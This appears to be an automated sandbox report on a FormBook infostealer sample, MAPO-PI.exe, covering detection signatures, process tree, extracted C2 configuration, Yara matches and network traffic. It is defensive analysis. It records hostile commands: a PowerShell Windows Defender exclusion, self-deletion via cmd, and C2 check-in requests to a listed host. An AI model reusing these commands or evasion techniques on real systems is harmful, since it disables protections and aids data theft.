Windows Analysis Report MAPO-PI.exe

Overview

General Information

Sample Name: MAPO-PI.exe
Analysis ID: 510736
MD5: c619bbbe3c374c8fd3e9f2c26d087496
SHA1: a8f7e80f2c8e7687789f2267935610f81bc773d4
SHA256: 260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • MAPO-PI.exe (PID: 3868 cmdline: 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: C619BBBE3C374C8FD3E9F2C26D087496)
    • powershell.exe (PID: 2592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MAPO-PI.exe (PID: 5128 cmdline: C:\Users\user\Desktop\MAPO-PI.exe MD5: C619BBBE3C374C8FD3E9F2C26D087496)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 980 cmdline: /c del 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.0.MAPO-PI.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.0.MAPO-PI.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.MAPO-PI.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        3.0.MAPO-PI.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.0.MAPO-PI.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: Powershell Defender Exclusion
          Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe' , ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
          Sigma detected: Non Interactive PowerShell
          Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe' , ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
          Sigma detected: T1086 PowerShell Execution
          Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132799056056937018.2592.DefaultAppDomain.powershell

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: MAPO-PI.exe, Virustotal: Detection: 30%
          Source: MAPO-PI.exe, ReversingLabs: Detection: 39%
          Yara detected FormBook
          Source: Yara match, File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: MAPO-PI.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: MAPO-PI.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 159.65.10.143 80
          Source: C:\Windows\explorer.exe, Domain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exe, Domain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exe, Domain query: www.diofis.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Network Connect: 109.232.217.55 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.diofis.com/rigx/
          Source: Joe Sandbox View, ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox View, ASN Name: AEROTEK-ASTR AEROTEK-ASTR
          Source: global traffic, HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1 | Host: www.lifeinformpodcast.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1 | Host: www.transforming-leadership.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1 | Host: www.diofis.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 28 Oct 2021 05:41:15 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61797038-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 28 Oct 2021 05:41:35 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/" | Referrer-Policy: no-referrer-when-downgrade | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/7.4.24 | content-type: text/html; charset=UTF-8 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/" | x-litespeed-cache: miss | content-length: 33607 | date: Thu, 28 Oct 2021 05:41:56 GMT
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/partnerlerimiz/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/wlwmanifest.xml
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-json/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/xmlrpc.php?rsd
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com?sccss=1&#038;ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://api.w.org/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://m0n.co/ga
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://schema.org
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-FE02SN0XC6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.monsterinsights.com/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
          Source: unknown DNS traffic detected: queries for: www.lifeinformpodcast.com
          Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1 Host: www.lifeinformpodcast.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1 Host: www.transforming-leadership.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1 Host: www.diofis.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: MAPO-PI.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C6B150 appears 66 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: String function: 0189B150 appears 133 times
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D50 NtCreateFile,3_2_00419D50
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E00 NtReadFile,3_2_00419E00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E80 NtClose,3_2_00419E80
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,3_2_00419F30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419D4A NtCreateFile,3_2_00419D4A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DFB NtReadFile,3_2_00419DFB
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419DA2 NtCreateFile,3_2_00419DA2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419E7A NtClose,3_2_00419E7A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00419F2D NtAllocateVirtualMemory,3_2_00419F2D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk,3_2_018D99A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_018D9910
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_018D98F0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk,3_2_018D9840
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_018D9860
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_018D9A00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,3_2_018D9A20
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk,3_2_018D9A50
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95D0 NtClose,LdrInitializeThunk,3_2_018D95D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9540 NtReadFile,LdrInitializeThunk,3_2_018D9540
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,3_2_018D9780
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_018D97A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,3_2_018D9710
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_018D96E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_018D9660
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D99D0 NtCreateProcessEx,3_2_018D99D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9950 NtQueueApcThread,3_2_018D9950
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D98A0 NtWriteVirtualMemory,3_2_018D98A0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9820 NtEnumerateKey,3_2_018D9820
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DB040 NtSuspendThread,3_2_018DB040
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA3B0 NtGetContextThread,3_2_018DA3B0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9B00 NtSetValueKey,3_2_018D9B00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A80 NtOpenDirectoryObject,3_2_018D9A80
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9A10 NtQuerySection,3_2_018D9A10
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D95F0 NtQueryInformationFile,3_2_018D95F0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9520 NtWaitForSingleObject,3_2_018D9520
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DAD30 NtSetContextThread,3_2_018DAD30
